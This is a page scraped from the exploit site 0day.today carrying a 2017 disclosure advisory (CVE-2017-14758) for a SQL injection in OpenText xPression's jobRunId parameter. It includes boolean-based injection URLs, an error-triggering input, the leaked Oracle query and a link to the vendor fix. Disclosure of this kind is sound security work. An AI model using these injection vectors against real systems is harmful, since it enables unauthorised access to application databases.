0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

OpenText Document Sciences xPression 4.5SP1 Patch 13 - jobRunId SQL Injection Vulnerability

Author

Marcin Woloszyn

Risk

[

Security Risk High

]

0day-ID

Category

Date add

CVE

Platform

Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14758
 
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
 
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
 
SQL Injection:
==============
 
Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.
 
Vector :
--------
 
True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2
 
Additionally:
 
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa
 
Results in the following error in response:
 
HTTP/1.1 200 OK
[...]
  <b>Errors:&nbps;</b>
 
  See nested exception&#x3b; nested exception is&#x3a;
java.lang.RuntimeException&#x3a;
com.dsc.uniarch.cr.error.CRException&#x3a; CRReportingSL&#x3a; Method
getJobRunsByIds did not succeed because of a database operation
failure.&#x3b;
&#x9;---> nested com.dsc.uniarch.cr.error.CRSyntaxException&#x3a;
Database syntax error &#x3a;SELECT  JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID&#x3d;1502642747222443244706554841153aaa.&#x3b;
&#x9;---> nested java.sql.SQLSyntaxErrorException&#x3a;
ORA-00933&#x3a; SQL command not properly ended
 
An attacker can see whole query and injection point. This can also be
used for error-based data extraction.
 
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

OpenText Document Sciences xPression 4.5SP1 Patch 13 - jobRunId SQL Injection Vulnerability

Report Error

Report Error